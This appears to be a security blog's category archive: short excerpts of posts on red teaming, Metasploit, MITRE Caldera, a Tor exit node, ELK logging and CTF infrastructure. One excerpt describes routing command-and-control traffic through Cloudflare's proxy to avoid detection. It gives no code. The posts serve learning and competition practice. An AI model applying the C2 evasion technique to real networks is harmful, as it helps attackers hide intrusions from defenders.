Category Archives: ForFunAndWumbos

PoC: Using Cloudflare as an HTTP C2 with Powershell Empire

For a red teamer, one of the biggest challenges is utilizing a command-and-control(C2) server without being discovered and blocked. This is because the detected traffic is not coming from a trusted source. One way around this is to use CloudFlare’s free HTTP reverse proxy service as your C2. By pivoting all HTTP traffic through these proxies, it becomes much harder for a network defender to detect malicious intent.

Continue reading

Part 1: Running TOR exit node – Install/Setup exit node

In this blog post series, I will be covering how to setup a Tor exit node for security research. The educational goals of this series is to learn more about network security monitoring, logging, and enrichment to create a threat intelligence pipeline. My exit node will collect data that will be ingested and returned to the community as intelligence.

Continue reading

Install/Setup MITRE Caldera the automated cyber adversary emulation system

In this blog post I will be covering how to setup and utilize MITRE’s new tool called Caldera. Caldera is a cyber adversary emulation system that operates on a server/agent model. On the server you can create adversary campaigns that are deployed to your agents. Your agents will periodically call back with their results and progress. Let’s begin!

Continue reading

Part 3: How to Red Team – Setting up a red team infrastructure

In this post I thought I would demonstrate how to setup an environment for a red teamer. PLEASE take this environment with a gain of salt because everyone will have a different setup!!! This guide is to show the basics and hopefully a template based on the Armitage/Cobalt Strike architecture. If your interested in the pinnacle of red team setups take a look at Alex Levinson’s post about the CCDC Red team or the blog Room 362 by Rob Fuller.

Continue reading

Creating macOS VM on VMware Fusion

I had no idea that Mac OSX users had the ability to create Mac OSX VMs with VMware Fusion. Say that last part five times fast lol. I am going to walk you through the process of creating a macOS(Sierra) VM on my laptop. I would like to give original credit to VMware but I want to share this with my readers. The ability to create Mac OSX VMs allows me to analyze Mac OSX malware in a safe environment, whoop whoop.

Continue reading

Part 2: How to red team – Metasploit framework

In this post I am going to briefly cover the exploitation process with the  Metasploit framework. A framework is defined as a real or conceptual structure intended to serve as a support or guide for the building of something that expands the structure into something useful. The Metasploit framework allows red teamers to configure an exploit, choose a payload, an encoding technique to obfuscate the payload, and post-exploitation modules after access is gained. The next couple of sections are going to walk through the process of exploitation. I believe the Metasploit approach is a template to know because other frameworks and tools follow the same flow. Continue reading

Part 1: How to Red Team – Scanning and Enumeration

I have to be honest that my red team skills could use some improvement. I firmly believe that red teaming is a skill and a mindset that people have. I believe some people are naturally born with this mindset and others develop it, I am a developer :).Currently, I am aspiring to become an incident responder because the thrill of the hunt seems like A LOT of fun to me. But to be an effective incident responder I have to understand my adversary and their strategies.

This blog post series will include my approach of learning how to become a red teamer in a competition type of environment. Now my reasoning for this is because I have the ability to compete in multiple competitions as red teamer as a college student. Additionally, I hope to periodically return to these posts and update them with new tactics and tools that I find and use.

Continue reading

Intro to the ELK Stack on CentOS 7

This is a two part series on setting up an ELK stack to receive syslog and in the next post Bro logs. The ELK stack is an awesome collection of software but a complicated MumboJumboCombo of components. I wanted to help break that barrier for beginners and to help explain how each component works. So stick with me on this two part series! I would like to give credit to this DigitalOcean post writer for the ELK stack write-up which I’ll be referencing. Additionally my Github contains a script to setup the ELK stack for CentOS 7 64-bit based on the guide below.

Continue reading

RC3 Fall 2016 CTF Infrastructure

 

web-banner

 

In this blog post I will be walking you through how I setup my club’s CTF infrastructure on AWS. I take great pride as the RC3 CTF infrastructure captain (with a bit of an inflated ego 🙂 ) that my infrastructure as a whole never had any downtime! Additionally, our CTF attracted a 1,000 users over the course of a weekend, which was a great stress test for my infrastructure.

This post consists of the following AWS services which are EC2, S3, VPCs, Route 53, RDS, and IAM. Our infrastructure utilized software and services such as CentOS, Ubuntu, HAProxy, Let’s Encrypt, CTFd, Bro, and Nginx/uwsgi. Please keep in mind this guide is a sys admin guide and not a security guide. Some of the security measures implemented in the infrastructure have been left out of this guide to thwart individuals from taking advantage of this build in the future. Without further ado, here we go on the wild ride of creating a CTF cloud computing infrastructure in Amazon’s Web Services (AWS) :).

Continue reading